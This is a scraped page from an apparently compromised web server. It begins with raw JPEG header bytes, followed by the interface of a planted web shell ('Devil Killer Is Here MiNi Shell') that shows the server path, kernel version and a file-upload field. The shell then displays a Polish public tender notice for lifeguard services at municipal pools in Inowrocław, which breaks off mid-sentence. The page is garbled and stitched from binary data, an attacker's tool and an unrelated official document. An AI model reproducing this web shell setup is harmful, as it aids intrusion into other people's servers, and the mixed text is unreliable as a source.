JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030623701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ratownictwa wodnego na pływalniach i basenie<br/>Ośrodka Sportu i Rekreacji w Inowrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Inowrocław - Ośrodek Sportu i Rekreacji w Inowrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000329881</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">aleja Niepodległości 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Inowrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@osir.inowroclaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.osir.inowroclaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> w zakresie kultury fizycznej i sportu </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ratownictwa wodnego na pływalniach i basenie<br/>Ośrodka Sportu i Rekreacji w Inowrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-689c0607-5831-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00306237</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000828/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 &#34;Świadczenie usług ratownictwa wodnego na pływalniach i basenie Ośrodka Sportu i Rekreacji w Inowrocławiu&#34; (dotyczy 2022 roku)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://osir-inowroclaw.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://osir-inowroclaw.ezamawiajacy.pl<br/>określone w SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">określone w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">określone w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2311-2/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Świadczenie usług ratownictwa wodnego na pływalniach i basenie Ośrodka Sportu i Rekreacji w Inowrocławiu”, w zakresie stanowiącym minimalne wymagania do świadczonych usług:<br/>1) określonych w:<br/>a) ustawie z 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. z 2020 r. poz. 350, z późn. zm.) w szczególności wskazane w art. 13 i 16 niniejszej ustawy,<br/>b) ustawie z 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2021 r. poz. 2053, z późn. zm.) w szczególności wskazane w art. 14,<br/>2) przestrzegania regulaminów w obiektach pływalni i basenu,<br/>3) Zamawiający uprawnia ratowników wodnych do nie wpuszczania na obszar wodny lub żądania opuszczenia go przez osoby, których zachowanie wyraźnie wskazuje, że znajdują się one w stanie nietrzeźwości lub są pod wpływem środka odurzającego,<br/>4) niezwłocznego zgłaszania pracownikowi kasy o przekroczeniu stanów minimalnych zapasów środków i materiałów do udzielania pomocy przedmedycznej oraz wyposażenia sprzętu medycznego i ratowniczego,<br/>5) wykorzystywania punktów medycznych i socjalnych wyłącznie podczas świadczenia usług objętych przedmiotem zamówienia,<br/>6) bieżącego prowadzenia dokumentacji prowadzonych samodzielnie działań ratowniczych, uszkodzeń lub braków w wyposażeniu oraz innych zdarzeń zaistniałych w trakcie świadczenia usług,<br/>7) sterowania oświetleniem w obrębie niecek i dostosowywanie go do potrzeb zapewnienia bezpieczeństwa użytkownikom.<br/><br/>2. Wykaz obiektów:<br/>1) Kryta Pływalnia „Wodny Park&#34;, ul. Toruńska 46-48 w Inowrocławiu; <br/>obiekt posiada nieckę o wymiarach 12,5 x 25,0 m, nieckę rekreacyjną o głębokości 0,45 – 1,2 m z atrakcjami i hamownią, dwie wanny jacuzzi;<br/>trzy stanowiska ratownicze;<br/>2) Kryta Pływalnia „Delfin”, ul. M. Wierzbińskiego 11 w Inowrocławiu;<br/>obiekt posiada nieckę o wymiarach 12,3 x 24,85 m;<br/>dwa stanowiska ratownicze;<br/>3) Basen Solankowy, ul. Świętokrzyska 107 w Inowrocławiu;<br/>obiekt posiada nieckę o wymiarach 24,93 x 6,0 m, jedną wannę jacuzzi;<br/>jedno stanowisko ratownicze,<br/>- godziny funkcjonowania pływalni i basenu zostały określone w załącznikach nr 1 i 3 do uchwały nr XVI/164/2019 Rady Miejskiej Inowrocławia z dnia 28 października 2019 r. w sprawie ustalenia regulaminów obiektów i urządzeń użyteczności publicznej na terenie Miasta Inowrocławia, w tym oddanych w trwały zarząd (Dz. Urz. Województwa Kujawsko – Pomorskiego poz. 5754) - regulaminów udostępnionych na terenach pływalni i basenu OSiR.<br/><br/>3. Przerwy śniadaniowe dla ratowników wodnych:<br/>1) w Krytej Pływalni „Wodny Park”:<br/>a) gdy obiekt jest czynny od godziny 6.00 do godziny 22.00:<br/>- dla pierwszego ratownika wodnego w godzinach od 10.00 do 10.15 oraz w godzinach od 18.00 do 18.15,<br/>- dla drugiego ratownika wodnego w godzinach od 10.15 do 10.30 oraz w godzinach od 18.15 do 18.30,<br/>- dla trzeciego ratownika wodnego w godzinach od 10.30 do 10.45 oraz w godzinach od 18.30 do 18.45,<br/>b) gdy obiekt jest czynny od godziny 10.00 do godziny 22.00:<br/>- dla pierwszego ratownika od godziny 16.00 do godziny 16.15,<br/>- dla drugiego ratownika od godziny 16.15 do godziny 16.30,<br/>- dla trzeciego ratownika od godziny 16.30 do godziny 16.45;<br/>2) w Krytej Pływalni „Delfin”:<br/>a) gdy obiekt jest czynny od godziny 6.00 do godziny 22.00:<br/>- dla pierwszego ratownika wodnego w godzinach od 10.00 do 10.15 oraz w godzinach od 18.00 do 18.15,<br/>- dla drugiego ratownika wodnego w godzinach od 10.15 do 10.30 oraz w godzinach od 18.15 do 18.30,<br/>b) gdy obiekt jest czynny od godziny 10.00 do godziny 22.00:<br/>- dla pierwszego ratownika od godziny 16.00 do godziny 16.15,<br/>- dla drugiego ratownika od godziny 16.15 do godziny 16.30;<br/>3)w Basenie Solankowym:<br/>Zamawiający zapewni stanowisko pozwalające na nadzór i konsumpcję na terenie niecki basenowej.<br/><br/>4. 1) Planowana łączna ilość godzin usług ratownictwa wodnego wynosi 28.607 godz.<br/>2) Powyższa łączna ilość godzin jest wartością maksymalną:<br/>a) uwzględniającą pomniejszenie nominalnego wymiaru liczby godzin funkcjonowania pływalni i basenu, o liczbę godzin przerw technologicznych i<br/>b) nieuwzględniającą innych nie dających się przewidzieć w chwili zawarcia umowy przerw lub zmian w godzinach funkcjonowania pływalni i basenu.<br/>3) Powyższe godziny funkcjonowania pływalni i basenów mogą być modyfikowane w każdym czasie w zależności od potrzeb Zamawiającego.<br/>4) zgodnie z art. 433 pkt 4 ustawy Pzp Zamawiający określa wymiar świadczonych usług ratownictwa wodnego w okresie realizacji przedmiotu zamówienia nie niższy niż 9.690 godz. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">75252000-7 - Służby ratownicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-02 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Określenie rodzaju usług podobnych, dających się przewidzieć na dzień składania wniosku:<br/>Przedmiotem zamówienia będziet świadczenie usług ratownictwa wodnego na pływalniach i basenie Ośrodka Sportu i Rekreacji w Inowrocławiu, w zakresie stanowiącym minimalne wymagania do świadczonych usług:<br/>1) określonych w:<br/>a) ustawie z 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (tekst jednolity Dz. U. z 2020 r. poz. 350 z późn. zm.) w szczególności wskazanych w art. 13 i 16 niniejszej ustawy,<br/>b) ustawie z 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tekst jednolity Dz. U. z 2021 r. poz. 2053) w szczególności wskazanych w art. 14,<br/>2) przestrzegania regulaminów w obiektach pływalni i basenu,<br/>3) Zamawiający uprawnia ratowników wodnych do nie wpuszczania na obszar wodny lub żądania opuszczenia go przez osoby, których zachowanie wyraźnie wskazuje, że znajdują się one w stanie nietrzeźwości lub są pod wpływem środka odurzającego, <br/>4) niezwłocznego zgłaszania pracownikowi kasy o przekroczeniu stanów minimalnych zapasów środków i materiałów do udzielania pomocy przedmedycznej oraz wyposażenia sprzętu medycznego i ratowniczego,<br/>5) wykorzystywania punktów medycznych i socjalnych wyłącznie podczas świadczenia usług objętych przedmiotem zamówienia,<br/>6) bieżącego prowadzenia dokumentacji prowadzonych samodzielnie działań ratowniczych, uszkodzeń lub braków w wyposażeniu oraz innych zdarzeń zaistniałych w trakcie świadczenia usług,<br/>7) sterowania oświetleniem w obrębie niecek i dostosowywanie go do potrzeb zapewnienia bezpieczeństwa<br/><br/><br/>Zamówienia podobne w wysokości max 15% na szczególne potrzeby Zmawiającego nie dające się przewidzieć na dzień składania wniosku. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych usług jak w zamówieniu podstawowym, zgodnych z przedmiotem zamówienia podstawowego, o wartości nie większej niż 15% wartości zamówienia podstawowego, gdy zaistnieje uzasadniona potrzeba oraz zostaną zapewnione środki finansowe na ten cel.<br/>Określenie rodzaju usług podobnych, dających się przewidzieć na dzień składania wniosku:<br/>Przedmiotem zamówienia będzie świadczenie usług ratownictwa wodnego na pływalniach i basenie Ośrodka Sportu i Rekreacji w Inowrocławiu, w zakresie stanowiącym minimalne wymagania do świadczonych usług:<br/>1) określonych w:<br/>a) ustawie z 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (tekst jednolity Dz. U. z 2020 r. poz. 350 z późn. zm.) w szczególności wskazanych w art. 13 i 16 niniejszej ustawy,<br/>b) ustawie z 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tekst jednolity Dz. U. z 2021 r. poz. 2053) w szczególności wskazanych w art. 14,<br/>2) przestrzegania regulaminów w obiektach pływalni i basenu,<br/>3) Zamawiający uprawnia ratowników wodnych do nie wpuszczania na obszar wodny lub żądania opuszczenia go przez osoby, których zachowanie wyraźnie wskazuje, że znajdują się one w stanie nietrzeźwości lub są pod wpływem środka odurzającego, <br/>4) niezwłocznego zgłaszania pracownikowi kasy o przekroczeniu stanów minimalnych zapasów środków i materiałów do udzielania pomocy przedmedycznej oraz wyposażenia sprzętu medycznego i ratowniczego,<br/>5) wykorzystywania punktów medycznych i socjalnych wyłącznie podczas świadczenia usług objętych przedmiotem zamówienia,<br/>6) bieżącego prowadzenia dokumentacji prowadzonych samodzielnie działań ratowniczych, uszkodzeń lub braków w wyposażeniu oraz innych zdarzeń zaistniałych w trakcie świadczenia usług,<br/>7) sterowania oświetleniem w obrębie niecek i dostosowywanie go do potrzeb zapewnienia bezpieczeństwa<br/><br/><br/>Zamówienia podobne w wysokości max 15% na szczególne potrzeby Zmawiającego nie dające się przewidzieć na dzień składania wniosku.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert<br/><br/>1. Kryteria oceny ofert:<br/>1) Cena – 60%<br/>2) Doświadczenie zawodowe ratownika – 40 %<br/><br/>2. Sposób oceny ofert:<br/>1) Cena (C) – oferta z najniższą ceną otrzyma maksymalną ilość punktów = 60, oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej,<br/>według wzoru:<br/> C = (cena najtańszej : cena badanej) x 60<br/><br/>2) Doświadczenie zawodowe ratownika (D) – Zamawiający przyzna:<br/>a) 10 punktów wykonawcy, który w ofercie oświadczy, że ratownicy przewidziani do realizacji zamówienia posiadają co najmniej roczne doświadczenie na stanowisku ratownika wodnego,<br/>b) 20 punktów wykonawcy, który w ofercie oświadczy, że ratownicy przewidziani do realizacji zamówienia posiadają co najmniej pięcioletnie doświadczenie na stanowisku ratownika wodnego,<br/>c) 30 punktów wykonawcy, który w ofercie oświadczy, że ratownicy przewidziani do realizacji zamówienia posiadają co najmniej dziesięcioletnie doświadczenie na stanowisku ratownika wodnego,<br/>d) 40 punktów wykonawcy, który w ofercie oświadczy, że ratownicy przewidziani do realizacji zamówienia posiadają co najmniej piętnastoletnie doświadczenie na stanowisku ratownika wodnego.<br/><br/>Uwaga:<br/>Zamawiający określa minimalną ilość ratowników wodnych dla zabezpieczenia prawidłowego wykonania przedmiotu zamówienia na 20 osób (ratowników wodnych).<br/><br/>Kryterium „doświadczenie zawodowe ratownika” będzie rozpatrywane na podstawie informacji złożonej przez Wykonawcę. W tym celu wykonawca wraz z ofertą musi złożyć wykaz osób przewidzianych do realizacji zamówienia, w którym należy określić imię i nazwisko osoby, miejsce/miejsca dotychczasowego zatrudnienia (nazwa, adres), okres zatrudnienia.<br/>Zamawiający zastrzega sobie prawo do zweryfikowania informacji zawartych w wykazie (wzór informacji stanowi załącznik do SWZ).<br/><br/>Punkty przyznawane będą w oparciu o informację wykonawcy, tj. np. w przypadku wykazania przez wykonawcę, że przewiduje do realizacji:<br/>	3 ratowników z doświadczeniem co najmniej rocznym,<br/>	8 ratowników z doświadczeniem co najmniej pięcioletnim<br/>	4 ratowników z doświadczeniem co najmniej dziesięcioletnim,<br/>	5 ratowników z doświadczeniem co najmniej piętnastoletnim,<br/><br/>Zamawiający przyzna 20 punktów uwzględniając największą liczbę ratowników w danym przedziale doświadczenie zawodowe ratownika.<br/><br/>3. Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku.<br/><br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska największą liczbę punktów (P), będącą suma punktów przyznanych w poszczególnych kryteriach:<br/><br/> P = C + D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe ratownika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile to wynika z odrębnych przepisów, tj.<br/>a) warunkiem udziału w postępowaniu jest posiadanie przez wykonawców uprawnień do wykonywania usług ratownictwa wodnego zgodnie z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. z 2020 r., poz. 350 z późn. zm.), ponadto wykonawca musi być wpisany do wykazu podmiotów uprawnionych do wykonywania zadań ratownictwa wodnego prowadzonym przez Ministerstwo Spraw Wewnętrznych i Administracji dostępnym pod adresem: https://www.gov.pl ,<br/>b) warunkiem udziału w postępowaniu jest posiadanie przez wykonawców uprawnień do wykonywania usług ratownictwa wodnego zgodnie z ustawą z 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2021 r. poz. 2053, z późn. zm.) w zakresie niezbędnym do realizacji przedmiotu zamówienia, ponadto wykonawca musi być wpisany do rejestru jednostek współpracujących z systemem Państwowego Ratownictwa Medycznego prowadzonym przez właściwego Wojewodę,<br/>2) sytuacji ekonomicznej lub finansowej, tj.<br/>posiadanie przez wykonawców odpowiedniego ubezpieczenia odpowiedzialności cywilnej na minimalną sumę gwarancyjną w wysokości 1 000 000,00 zł, tj. w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,<br/>3) zdolności technicznej lub zawodowej, tj.<br/>a) wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali prawidłowo i ukończyli dwie usługi w zakresie objętym przedmiotem zamówienia, <br/>b) dysponują co najmniej 20 osobami posiadającymi szczególne indywidualne uprawnienia w zakresie świadczenia usług ratownictwa wodnego zgodnie z ustawą o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. z 2020 r. poz. 350 z późn. zm.) oraz pomocy przedmedycznej zgodnie z ustawą o Państwowym Ratownictwie Medycznym (Dz. U. z 2021 r. poz. 2053, z późn. zm.), <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda złożenia odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) w celu potwierdzenia przez wykonawcę warunków udziału w postępowaniu dotyczącym prowadzenia określonej działalności gospodarczej lub zawodowej , o ile to wynika z odrębnych przepisów, Zamawiający żąda złożenia poświadczonej za zgodność z oryginałem kopii:<br/>a) decyzji właściwego Ministra o wyrażeniu zgody na wykonywanie ratownictwa wodnego przez wykonawcę,<br/>b) decyzji właściwego Wojewody o wpisaniu wykonawcy do rejestru jednostek współpracujących z systemem 